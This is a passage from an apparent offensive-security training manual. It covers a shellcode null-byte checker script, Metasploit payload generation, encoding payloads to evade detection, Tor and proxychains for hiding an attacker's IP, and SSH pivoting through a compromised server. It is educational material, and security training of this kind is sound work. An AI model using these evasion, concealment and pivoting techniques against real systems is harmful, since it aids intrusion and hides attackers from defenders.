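# The byte list as printed by `xxd -i sleep.bin` in the manual (copied inline so
# the script runs without the .bin file).
XXD_I_OUTPUT = """
  0x31, 0xc0, 0xbb, 0x42, 0x24, 0x80, 0x7c, 0x66, 0xb8, 0x88, 0x13, 0x50,
  0xff, 0xd3
"""

# Constructed encodings of the alternatives discussed under "Avoiding Null Bytes":
MOV_EAX_5000 = bytes.fromhex("b888130000")  # mov eax, 5000  (imm32 -> two 0x00 bytes)
MOV_AX_5000 = bytes.fromhex("66b88813")     # mov ax, 5000   (imm16 -> no nulls)
MOV_EAX_0 = bytes.fromhex("b800000000")     # mov eax, 0     (four 0x00 bytes)
XOR_EAX_EAX = bytes.fromhex("31c0")         # xor eax, eax   (same effect, no nulls)


def parse_xxd_i(text: str) -> bytes:
    """Pull the 0x.. byte literals out of `xxd -i` style output."""
    return bytes(int(tok, 16) for tok in re.findall(r"0x([0-9a-fA-F]{2})", text))


def to_c_string(code: bytes) -> str:
    """Render bytes in the \\x.. escaped form used in a C char[] (what xxd-shellcode.sh prints)."""
    return "".join("\\x%02x" % b for b in code)


def find_null_bytes(code: bytes) -> List[int]:
    """Offsets of 0x00 bytes. A C string copy (strcpy-style) stops at the first one,
    so any hit means the shellcode would be truncated when passed as a string."""
    return [i for i, b in enumerate(code) if b == 0]


def check_shellcode(text: str) -> Dict[str, object]:
    """Parse xxd -i output and report length, C form and null-byte positions."""
    code = parse_xxd_i(text)
    return {
        "length": len(code),
        "c_string": to_c_string(code),
        "nulls": find_null_bytes(code),
    }


if __name__ == "__main__":
    report = check_shellcode(XXD_I_OUTPUT)
    print(report["length"], "bytes, nulls at", report["nulls"])
    print(report["c_string"])
    print("mov eax,5000 nulls:", find_null_bytes(MOV_EAX_5000),
          " mov ax,5000 nulls:", find_null_bytes(MOV_AX_5000))
```

Running it on the manual's dump reports 14 bytes with no nulls and prints exactly the string that goes into `code[]` in shellcodetest.c. The constructed `mov eax, 5000` encoding shows nulls at offsets 3 and 4, which is why the assembly uses the 16-bit `mov ax, 5000` after zeroing eax with `xor`.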
Metasploit:
The Metasploit Framework is a development platform for creating security tools and exploits.
Developed by HD Moore.
The framework is written in the Ruby programming language.
Components of Metasploit:
Exploits
◦ Defined as modules that use payloads.
Payloads
◦ Payloads consist of code that runs remotely.
Auxiliaries
◦ Exploits without payloads are called auxiliaries.
Encoders
◦ Encoders ensure that payloads make it to their destination.
Nops
◦ Nops keep the payload sizes consistent.
Metasploit User Interfaces.
Armitage:
• Armitage is a graphical cyber attack management tool for Metasploit that visualizes
your targets, recommends exploits, and exposes the advanced capabilities of the
framework.
• For those who are not comfortable using a command-line interface.
• Valuable for managing remote Metasploit instances and for collaboration.
Other Interfaces.
Msfweb:
◦ Launches an HTTP server and makes the framework available to be controlled by a
web application.
Msfcli:
◦ Command-line interface which looks like a command prompt.
◦ For those who like CMD.exe.
MsfConsole:
◦ Console which looks more like a bash shell.
◦ Has neat formatting.
◦ Easy to use.
◦ We will be learning Metasploit in MSFCONSOLE.
Launching the MsfConsole.
◦ Windows: Start->All Programs->Metasploit->msfconsole.
◦ Backtrack: Open your favorite shell and type msfconsole.
Booting up the framework.
Start with msfconsole -h, which shows all the commands that can be used in this
console.
A Console Cheat Sheet
use <module> - start configuring a module
show <options> - show configurable options
set <varname> <value> - set an option
exploit - launch an exploit module
run - launch a non-exploit (auxiliary) module
sessions -i <n> - interact with session "n"
help <command> - get help for a command
Msfencode and msfpayload are the two features of Metasploit which support writing custom
exploits.
Msfpayload generates the necessary code for the exploit, while
msfencode encodes it to keep it undetected by protections.
msfencode -h : Display the help file of msfencode
msfencode -l : List the available encoders
msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho):
Format in which to display the encoded buffer
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe:
Uses the shikata_ga_nai encoder to encode payload.raw 5 times and exports it to a file
called encoded_payload.exe
Using Metasploit payload generators:
msfpayload is a command-line instance of Metasploit that is used to generate and output
all of the various types of shellcode that are available in Metasploit. The most common
use of this tool is for the generation of shellcode for an exploit that is not currently in the
Metasploit Framework or for testing different types of shellcode and options before
finalizing a module.
This tool has many different options and variables available to it, but they may not all be
fully realized given the limited output in the help banner.
These tools can be used to generate Shellcode for any of the following programs.
The list can be further updated or synced with exploit-db.
Once you have selected a payload, there are two switches that are used most often when
crafting the payload for the exploit you are creating.
In the example below we have selected a simple Windows bind shell. When we add the
command-line argument "O" with that payload, we get all of the available configurable
options for that payload.
• As we can see from the output, we can configure three different options with this specific
payload, if they are required, if they come with any default settings, and a short
description:
EXITFUNC
◦ Required
◦ Default setting: process
LPORT
◦ Required
◦ Default setting: 4444
RHOST
◦ Not required
◦ No default setting
Setting these options in msfpayload is very simple. An example is shown below of
changing the exit technique and listening port of the shell:
Now that all of that is configured, the only option left is to specify the output type, such as
C, Perl, Raw, etc.
For this example we are going to output our Shellcode as Perl:
Exercises:
o Generate Shellcode for VNC inject using msfpayload.
o Write a simple program in C which uses the above generated Shellcode as payload.
Proxies and Tunneling Techniques
Objectives: At the end of this module you should be able to
Hide your IP address in an attack. Tunnel through the SSH and HTTP protocols.
Proxies
Description: A proxy is an intermediate piece of software or device which forwards packets from one system to another, hiding the true identity of the user.
Since the end system can only see the packet coming from the previous system, it is difficult to trace directly where the original packet originated.
Types of Proxies:
Tunneling Proxy: A proxy server that passes requests and responses unmodified is usually called a gateway or sometimes a tunneling proxy.
Forward Proxy: A forward proxy is an Internet-facing proxy used to retrieve content from a wide range of sources (in most cases anywhere on the Internet).
Reverse Proxy: A reverse proxy is (usually) an Internet-facing proxy used as a front-end to control and protect access to a server on a private network, commonly also performing tasks such as load-balancing, authentication, decryption or caching.
Protocols Supported:
HTTP
SSL
FTP
SOCKS
TOR:
Tor is an onion router which routes packets across many systems before reaching the end system. These systems form layers like the ones you see on an onion, hence the name onion router. The intermediate systems are mostly run by ordinary Internet users acting as relays.
To work with Tor, there are bundled packages such as Vidalia that come with a browser. However, the preferred way is to install Tor as a service, which opens port 9050, to
which any software can be connected.
Instructions for installing and usage:
To install Tor as a service under Linux (Debian flavours): BackTrack does not have the tor service installed, and it is also not available from the
repositories. With a little configuration we can add the tor service very easily. Open /etc/apt/sources.list and append the line
deb http://deb.torproject.org/torproject.org lucid main
Run apt-get update in the command line and install the package:
root@bt:~# apt-get update
root@bt:~# apt-get install tor
Start the service with the 'service' command:
root@bt:~# service tor start
Confirm the tor service status (a listener on port 9050) by using the netstat command.
To stop Tor:
root@bt:~# service tor stop
Also install proxychains, which is a proxy tool that ensures the packets are routed through
many systems before reaching the target system:
root@bt:~# apt-get install proxychains
proxychains usage:
Example:
System IP before proxychains:
IP address after using proxychains:
Pivoting (SSH tunneling)
Description: Pivoting is the concept of tunneling through a machine you already control to reach other systems on a network to which you have no direct access.
For example, the attacker (IP: 117.139.142.191) has attacked a system (IP: 49.230.123.123), say a web server, which is further connected to a local network with the IP range 10.42.43.1 - 10.42.43.100 where local services or possibly load balancers may be running.
The attacker cannot access the machines in the local network due to the firewall
configuration. However, since the attacker has successfully attacked the publicly accessible web server, he may be able to reach other machines through the web server (IP: 49.230.123.123).
Instructions for SSH pivoting:
Since we have SSH access to the web server, we can use SSH port forwarding to use it as our pivot. We run the following command on our attacking machine (the manual does not give the name of the SSH account on the web server; <user> stands in for it):
ssh -L 127.0.0.1:4444:10.42.43.1:4444 <user>@49.230.123.123
This will establish a forwarding from our local system (127.0.0.1) on port 4444 to
10.42.43.1 on port 4444 through the web server (IP: 49.230.123.123).
Exercises:
1. Using Tor and proxychains, scan a system with NMAP and test whether the attacker's machine is indeed hidden.
2. Configure the native browser to connect to
o a SOCKS proxy (TOR or online proxies)
o HTTP proxies
Document the findings and configuration steps.